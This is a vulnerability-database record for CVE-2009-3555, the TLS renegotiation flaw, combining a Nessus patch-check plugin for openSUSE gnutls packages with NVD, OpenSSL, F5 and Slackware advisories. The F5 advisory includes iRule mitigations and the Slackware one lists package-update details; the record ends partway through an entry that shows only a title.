{"id": "SUSE_11_2_GNUTLS-101206.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)", "description": "This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.", "published": "2011-05-05T00:00:00", "modified": "2011-05-05T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/53729", "reporter": "This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=554084", "https://lists.opensuse.org/opensuse-updates/2010-12/msg00051.html"], "cvelist": ["CVE-2009-3555"], "type": "nessus", "lastseen": "2021-01-17T14:05:44", "edition": 24, "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3555"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2009-3555"]}, {"type": "f5", "idList": ["SOL10737", "F5:K10737"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800466", "OPENVAS:870236", "OPENVAS:1361412562310840416", "OPENVAS:1361412562310122383", "OPENVAS:136141256231066278", "OPENVAS:136141256231066562", "OPENVAS:840505", "OPENVAS:1361412562310840453", "OPENVAS:870238", "OPENVAS:66353"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23220", "SECURITYVULNS:VULN:10388", "SECURITYVULNS:DOC:23890", "SECURITYVULNS:DOC:23561", "SECURITYVULNS:DOC:22982"]}, {"type": "fedora", "idList": ["FEDORA:4C4E710F878", "FEDORA:E3F6C10FD89", "FEDORA:DB226111816", "FEDORA:1B80628EDC8", "FEDORA:6A214110D58"]}, {"type": "seebug", "idList": ["SSV:15088", "SSV:18637", "SSV:67231"]}, {"type": "nessus", "idList": ["SUSE_11_JAVA-1_4_2-IBM-100510.NASL", "SUSE_11_1_GNUTLS-101206.NASL", "MANDRIVA_MDVSA-2010-069.NASL", "SSL_RENEGOTIATION.NASL", "F5_BIGIP_SOL10737.NASL", "SUSE_COMPAT-OPENSSL097G-6657.NASL", "UBUNTU_USN-927-1.NASL", "SUSE_OPENSSL-6655.NASL", "FEDORA_2009-13250.NASL", "SUSE_MOZILLA-NSS-6978.NASL"]}, {"type": "redhat", "idList": ["RHSA-2010:0164", "RHSA-2010:0155"]}, {"type": "ubuntu", "idList": ["USN-927-1", "USN-927-6", "USN-990-2", "USN-990-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2141-2:2C2CF", "DEBIAN:DSA-2141-4:2215A"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0165", "ELSA-2010-0164"]}, {"type": "centos", "idList": ["CESA-2010:0165"]}, {"type": "cert", "idList": ["VU:120541"]}, {"type": "exploitdb", "idList": ["EDB-ID:10071", "EDB-ID:10579"]}, {"type": "hackerone", "idList": ["H1:5617"]}, {"type": "cisco", "idList": ["CISCO-SA-20091109-TLS"]}], "modified": "2021-01-17T14:05:44", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-01-17T14:05:44", "rev": 2}, "vulnersScore": 6.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3647.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53729);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)\");\n script_summary(english:\"Check for the gnutls-3647 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00051.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"gnutls-2.4.1-26.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls-devel-2.4.1-26.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls-extra-devel-2.4.1-26.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls-extra26-2.4.1-26.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls26-2.4.1-26.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-26.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "53729", "cpe": ["p-cpe:/a:novell:opensuse:libgnutls-extra26", "p-cpe:/a:novell:opensuse:libgnutls26", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:libgnutls26-32bit", "p-cpe:/a:novell:opensuse:gnutls", "p-cpe:/a:novell:opensuse:libgnutls-devel", "p-cpe:/a:novell:opensuse:libgnutls-extra-devel"], "scheme": null, "immutableFields": []}

{"cve": [{"lastseen": "2021-02-06T13:30:38", "description": "The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a \"plaintext injection\" attack, aka the \"Project Mogul\" issue.", "edition": 10, "cvss3": {}, "published": "2009-11-09T17:30:00", "title": "CVE-2009-3555", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3555"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/a:openssl:openssl:1.0", "cpe:/o:debian:debian_linux:4.0", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:gnu:gnutls:2.8.5", "cpe:/o:canonical:ubuntu_linux:8.04", "cpe:/o:fedoraproject:fedora:13", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:fedoraproject:fedora:14", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/a:mozilla:nss:3.12.4", "cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:fedoraproject:fedora:12", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:apache:http_server:2.2.14", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:fedoraproject:fedora:11"], "id": "CVE-2009-3555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.04:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:nss:3.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:11:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.10:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:13:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0:*:openvms:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "openssl": [{"lastseen": "2020-09-14T11:36:47", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": " Implement RFC5746 to address vulnerabilities in SSL/TLS renegotiation.\n\n * Fixed in OpenSSL 0.9.8m (Affected 0.9.8-0.9.8l)\n", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENSSL:CVE-2009-3555", "href": "https://www.openssl.org/news/secadv/20091111.txt", "title": "Vulnerability in OpenSSL CVE-2009-3555", "type": "openssl", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "", "edition": 1, "modified": "2019-06-13T19:54:00", "published": "2013-07-06T01:56:00", "id": "F5:K10737", "href": "https://support.f5.com/csp/article/K10737", "title": "SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2016-05-30T21:02:08", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "edition": 1, "description": "A Man in the Middle attack allows an attacker to inject an arbitrary amount of chosen plain text into the application protocol stream data during a secure session renegotiation that uses SSL version 3.x or TLS version 1.x. This may provide an attacker the ability to perform arbitrary actions on affected websites with user's credentials. This vulnerability does not allow one to decrypt the intercepted network communication.\n\nInformation about this advisory is available at the following locations:\n\n**Note**: These links take you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555>\n\n**Note**: F5 thanks Marsh Ray, who originally identified and reported this vulnerability.\n\nThe IETF has adopted as [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>) a new extension to the TLS standard that addresses this issue. F5 Product Development has implemented this new extension beginning in BIG-IP versions 10.2.3 and 11.0.0.\n\n**Important**: When session renegotiation is disabled, some browsers may log an informational message that appears similar to the following example to the console, when connecting to F5 products:\n\nServer does not support RFC 5746, see CVE-2009-3555\n\nAlthough the message implies that the F5 product to which the browser is connecting is vulnerable to this attack, all vulnerable F5 Products have been patched to disable SSL/TLS renegotiation, and some have been further enhanced to allow explicit control over renegotiation, thus mitigating this attack. For more information regarding completed and planned updates related to this vulnerability, refer to the following table. Note that ID 223836 specifically addresses this error message.\n\nF5 Product Development is tracking this issue as follows:\n\nCR / ID | Description | Affected products | Included in \n---|---|---|--- \nCR132165 / \n \nID 213305 | Introduce the **&lt;disable|enable&gt;** parameter to the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command to control on a per-connection basis how TMM should respond to SSL 3.0/TLS 1.0 renegotiation requests. \n\n\n**Important**: Client-side session renegotiation is still enabled, by default, in versions prior to 10.1.0. In these versions, you must apply an iRule using the **SSL::renegotiate disable **command to each virtual server configuration you wish to protect from this vulnerability. Refer to the mitigation section, following, for more information.\n\n**Note**: For more information, refer to the DevCentral wiki page for the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command.\n\n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEngineering Hotfix available for: \nEnterprise Manager 1.8 \nCR132166 / \n \nID 213306 | Patch OpenSSL to disable midstream session renegotiation. This patch protects the Configuration utility and iControl against this vulnerability. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132167 / \n \nID 213307 | Enable midstream session renegotiation for the **big3d **and **gtmd**. This CR is a companion to CR132166, re-enabling mid-stream session renegotiation for the **big3d **and **gtmd** processes, which maintain long-lived iQuery-over-SSL connections that are renegotiated daily. These connections are mutually authenticated using 2-way SSL authentication prior to exchanging application traffic and, thus, are not vulnerable to the man-in-the-middle attacks described in this Solution. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132170 / \n \nID 213308 | Introduce a Client SSL / ServerSSL profile option to control whether midstream session renegotiation is allowed. In versions 10.1.0 - 10.2.2, the default setting for the Client SSL profile is **disabled**, and the default setting for the Server SSL profile is **enabled**. **Note**: BIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM | BIG-IP 10.1.0 and later \n \nCR132172 / \n \nID 223836 | Implement [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>), an extension to the TLS standard for secure midstream session renegotiation. **Note**: For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 10.2.3 \nBIG-IP 11.0.0 and later \n \nCR132177 / \nID 295760\n\nand\n\nCR132177-1 / \nID 294172\n\n| Patch OpenSSL to disable midstream session renegotiation. | FirePass | \n\nFirePass 7.0.0 and later \nFirePass 6.1.0 HF1 * \nFirePass 6.0.3 hotfix-132177-1 \nFirePass 6.0.2 hotfix-132177-1 \nFirePass 5.5.2 hotfix-132177-1 \nFirePass 5.5.1 hotfix-132177-1 \nFirePass 5.5 hotfix-132177-1 \n \nImportant: For version 6.1.0, the \nfix for this ID was not included in \nHF3 or HF4. Install the latest \ncumulative hotfix. \n \nID 37053 | Patch or upgrade Apache Tomcat to disable session renegotiation. | ARX | ARX 6.2.0 \n \n \nIf a named hotfix has been issued for your software version, you may download the referenced hotfix or later versions of the hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nIf an engineering hotfix has been issued for your software version, you should contact [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>), and reference this Solution number and the associated CR number to request the hotfix.\n\nFor a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of the F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nFor information about installing version 10.x hotfixes, refer to SOL10025: Managing BIG-IP product hotfixes (10.x).\n\n**Mitigation steps for BIG-IP LTM, ASM, PSM, Link Controller, WebAccelerator, or WOM SSL virtual servers**\n\nYou can use the Client SSL profile Renegotiation setting or an iRule to disable client-side session renegotiation for virtual servers. Refer to the following section that applies to your version:\n\n**Note**: Applications that require session renegotiation are inherently vulnerable to the attack. Only removal of the renegotiation requirement in the application itself will eliminate the vulnerability. If session renegotiation is disabled by any of the vulnerability mitigation steps described later, without modifying the application, client connections will be dropped. For example, IE 5.0 clients accessing applications which use SGC (Server Gated Cryptography) certificates are known to require renegotiation, and their connections would be disrupted by such a configuration.\n\n**Important**: Any mitigation action that re-enables session re-negotiation on patched vulnerable versions may re-expose your F5 system to this vulnerability. In some cases, iRule logic can be used to control this behavior. Refer to the following sections for details regarding your product and version.\n\n**BIG-IP versions 10.1.0 and later**\n\nBIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. SSL Renegotiation setting is **Enabled,** by default, in the SSL profiles, however, the system requires secure renegotiation of SSL connections. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension.\n\nIn BIG-IP version 10.1.0, the Renegotiation setting was added to the BIG-IP Client session and Server SSL profiles as a result of ID 213308 (formerly CR132180). In versions 10.1.0 - 10.2.2, the Renegotiation setting is **Disabled **by default in the Client SSL profile. Virtual servers using a Client SSL profile with the Renegotiation setting configured to **Disabled **are protected from this vulnerability.\n\nIf necessary, you can selectively enable renegotiation using the **SSL::renegotiate** iRules command on a virtual server that has renegotiation disabled in its Client SSL profile. For example, an iRule similar to the following enables renegotiation only for clients within a single Class C subnet:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nif { [IP::addr [IP::client_addr] equals 192.168.222.0/24] }{ \nSSL::renegotiate enable \n} \n}\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, and 10.1.0 through 10.2.x**\n\nTo mitigate the vulnerability, a BIG-IP system administrator may apply iRules similar to the following to each SSL virtual server. This sample iRule uses the **SSL::renegotiate** command to disable client-side session renegotiation, which prevents the BIG-IP system from processing a secondary session renegotiation request:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nSSL::renegotiate disable \n}\n\nThe **&lt;enable|disable&gt;**parameter was added to the **SSL::renegotiate** command in versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, 10.1.x, and 10.2.0 as a result of ID 213305 (formerly CR132165). In versions prior to 10.1.0, all virtual servers with a Client SSL profile applied will, by default, still accept session renegotiation.\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.4.x, 9.3.x prior to 9.3.1 HF8, and 10.0.x prior to 10.0.1 HF3**\n\nTo mitigate the vulnerability in versions that do not include the **SSL::renegotiate** command, apply an iRule similar to the following to each SSL virtual server. The iRule resets the connection if client-side SSL renegotiation is attempted.\n\nwhen CLIENT_ACCEPTED { \n# initialize TLS/SSL handshake count for this connection \nset sslhandshakecount 0 \n} \nwhen CLIENTSSL_HANDSHAKE priority 1 { \n# a handshake just occurred \nincr sslhandshakecount \n# is this the first handshake in this connection? \nif { $sslhandshakecount &gt; 1 } { \n# log (rate limited) the event (to /var/log/ltm) \nlog \"\\\\[VS [IP::local_addr]:[TCP::local_port] client [IP::remote_addr]:[TCP::remote_port]\\\\]:TLS/SSL renegotiation\" \n# if not, close the clientside connection \nreject \n} \n} \n\n\n**Note**: This example was provided by F5 DevCentral poster Lupo. The original post is available at the following location:\n\n[mitigating the TLS client-initiated renegotiation MITM attack](<http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic>)\n\nA separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n", "modified": "2013-07-05T00:00:00", "published": "2009-11-05T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/700/sol10737.html", "id": "SOL10737", "title": "SOL10737 - SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2019-05-30T07:36:52", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "New openssl packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\nand -current to fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/openssl-0.9.8k-i486-3_slack13.0.txz: Rebuilt.\n Patched to disable SSL renegotiation.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n (* Security fix *)\npatches/packages/openssl-solibs-0.9.8k-i486-3_slack13.0.txz: Rebuilt.\n Patched to disable SSL renegotiation.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/openssl-0.9.8h-i486-4_slack11.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/openssl-solibs-0.9.8h-i486-4_slack11.0.tgz\n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/openssl-0.9.8h-i486-4_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/openssl-solibs-0.9.8h-i486-4_slack12.0.tgz\n\nUpdated packages for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/openssl-0.9.8h-i486-4_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/openssl-solibs-0.9.8h-i486-4_slack12.1.tgz\n\nUpdated packages for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/openssl-0.9.8i-i486-4_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/openssl-solibs-0.9.8i-i486-4_slack12.2.tgz\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8k-i486-3_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8k-i486-3_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8k-x86_64-3_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8k-x86_64-3_slack13.0.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-0.9.8l-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-0.9.8l-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-0.9.8l-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-0.9.8l-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 11.0 packages:\n662fa4e1a24aba53e5a05850b27d5c16 openssl-0.9.8h-i486-4_slack11.0.tgz\nb08b28f848b64df600a958268dd6a350 openssl-solibs-0.9.8h-i486-4_slack11.0.tgz\n\nSlackware 12.0 packages:\n6cdad3839394c5d81f56b7812f38e1d2 openssl-0.9.8h-i486-4_slack12.0.tgz\ncd44b602ada795dd60c2e0a5b113a235 openssl-solibs-0.9.8h-i486-4_slack12.0.tgz\n\nSlackware 12.1 packages:\nf07db73dcfc7d0f09796199591805685 openssl-0.9.8h-i486-4_slack12.1.tgz\n8ad915a9a85bf049da8593f3966fa155 openssl-solibs-0.9.8h-i486-4_slack12.1.tgz\n\nSlackware 12.2 packages:\n71e904cdd763254146c3d17cb67dabd9 openssl-0.9.8i-i486-4_slack12.2.tgz\n3350b268966c39f884df46b839cbc216 openssl-solibs-0.9.8i-i486-4_slack12.2.tgz\n\nSlackware 13.0 packages:\nbf569bd9e2b6f6d12feb9926a2f4228c openssl-0.9.8k-i486-3_slack13.0.txz\ne9042a6460ee448bcb32dee4f090be74 openssl-solibs-0.9.8k-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n068a889c7120f569be44e7ffde9169d1 openssl-0.9.8k-x86_64-3_slack13.0.txz\n7602b43d1e51a121e1f4a33919be48bf openssl-solibs-0.9.8k-x86_64-3_slack13.0.txz\n\nSlackware -current packages:\n98f992b68c19070a6edeb0d4a6a0f559 openssl-solibs-0.9.8l-i486-1.txz\n\nSlackware x86_64 -current packages:\nc62ac6d683a8ed6f94da8c7555810d81 openssl-solibs-0.9.8l-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg openssl-0.9.8k-i486-3_slack13.0.txz openssl-solibs-0.9.8k-i486-3_slack13.0.txz", "modified": "2009-11-16T13:42:36", "published": "2009-11-16T13:42:36", "id": "SSA-2009-320-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.597446", "type": "slackware", "title": "openssl", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:50", "description": "\nTLS - Renegotiation", "edition": 1, "published": "2009-12-21T00:00:00", "title": "TLS - Renegotiation", "type": 